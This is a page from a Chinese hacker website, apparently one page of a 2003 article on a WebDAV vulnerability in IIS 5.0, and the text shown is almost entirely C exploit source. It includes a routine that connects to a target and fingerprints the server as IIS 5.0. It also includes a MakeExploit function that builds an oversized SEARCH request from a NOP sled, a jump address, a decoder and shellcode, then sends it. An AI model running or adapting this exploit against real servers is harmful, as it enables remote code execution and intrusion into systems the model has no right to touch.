 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| WebDav漏洞简单分析及通用exploit设计 | |||||
作者:eyas 文章来源:CnXHacker.Net 点击数: 更新时间:2003-5-18  |
|||||
|
break; case ERROR_RECV_TIMEOUT: printf("recv buff timeout.Maybe success?\n"); exit(1); break; default: exit(1); } } printf("Done.\n"); } int SendBuffer(char *ip, int iPort, unsigned char *buff, int len) { struct sockaddr_in sa; WSADATA wsd; SOCKET s; int iRet, iErr; char szRecvBuff[0x1000]; int i; iRet = ERROR_OTHER; memset(szRecvBuff, 0, sizeof(szRecvBuff)); __try { if (WSAStartup(MAKEWORD(1,1), &wsd) != 0) { printf("WSAStartup error:%d\n", WSAGetLastError()); __leave; } s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(s == INVALID_SOCKET) { printf("\nCreate socket failed:%d",GetLastError()); __leave; } //set socket recv timeout i=RecvTimeOut; setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,&i,sizeof(i)); sa.sin_family=AF_INET; sa.sin_port=htons(iPort); sa.sin_addr.S_un.S_addr=inet_addr(ip); iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa)); if(iErr == SOCKET_ERROR) { iRet = ERROR_CONNECT_FALIED; g_iConnectError++; __leave; } //reset flag g_iConnectError=0; iErr = send(s, buff, len,0); if(iErr == SOCKET_ERROR) { printf("send buffer error:%d.\n", WSAGetLastError()); __leave; } iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0); if(iErr == SOCKET_ERROR) { if(WSAGetLastError() == WSAETIMEDOUT) iRet = ERROR_RECV_TIMEOUT; if(WSAGetLastError() == 10054) iRet = ERROR_CONNECT_RESET; //printf("recv buffer error:%d.\n", WSAGetLastError()); __leave; } if(strstr(szRecvBuff, "Microsoft-IIS/5.0") == NULL) { iRet = ERROR_NOT_IIS; printf("Target not iis.\n"); __leave; } if(strstr(szRecvBuff, "404 Resource Not Found")) { iRet = ERROR_RESOURCE_NOTFOUND; __leave; } if(strstr(szRecvBuff, "400 Bad Request")) { iRet = ERROR_BAD_REQUEST; __leave; } if(strstr(szRecvBuff, "501 Not Supported")) { iRet = ERROR_METHOD_NOT_SUPORT; printf("501 Not Supported\n"); __leave; } } __finally { if(s != INVALID_SOCKET) closesocket(s); WSACleanup(); } return iRet; } // //offset为IIS PATH的长度 // int MakeExploit(unsigned int retaddr, int offset, char *host, char *ip, int iPort) { unsigned char jmpaddr[16]; unsigned char *pStr, szNOP[4]; int i, iNop, iRet; szNOP[0]=NOPCODE; szNOP[1]='\0'; //转换字符格式 sprintf(jmpaddr,"%%u%.2X%.2X%%u%.2X%.2X", retaddr>>8&0xFF, retaddr&0xFF, retaddr>>24&0xFF, retaddr>>16&0xFF); //分配内存 pStr = (unsigned char *)malloc(40000); //组合buffer strcpy(pStr, "SEARCH /"); //填充NOP CODE IISPATH+NOP = 0x260/2 for(i=offset;i<OVERPOINT/2;i++) strcat(pStr, szNOP); //jmp to decoder strcat(pStr, jmpover); //jmp addr strcat(pStr, jmpaddr); //decode real shellcode strcat(pStr, decoder); //real shellcode strcat(pStr, xShellCode); //计算后面还需填充多少个NOP CODE iNop = (BUFFLEN-OVERPOINT-8-strlen(decoder)/3-strlen(xShellCode)*2)/2; //填充NOP CODE for(i=0;i<iNop;i++) strcat(pStr, szNOP); strcat(pStr, " HTTP/1.0\n" "Content-Type: text/xml\n" "Content-length:8\n\n" "OOOOOOOO\n\n"); //发送我们精心构造的buff iRet = SendBuffer(ip, iPort, pStr, strlen(pStr)); //释放内存 free(pStr 上一页 [1] [2] [3] [4] [5] [6] [7] 下一页 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 通过建立安全模型保障Web数据 US CERT:谷歌eBay雅虎网站均 webshell下分离大文件资料 经典Webshell提权集合九招 四成Facebook用户轻易泄露身 FaceBook源代码泄漏 机器数量庞大 Google成WEB服 Web2.0带来营销领域深刻变化 安全专家:Web 2.0站点的coo Web安全性问题的层次关系 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
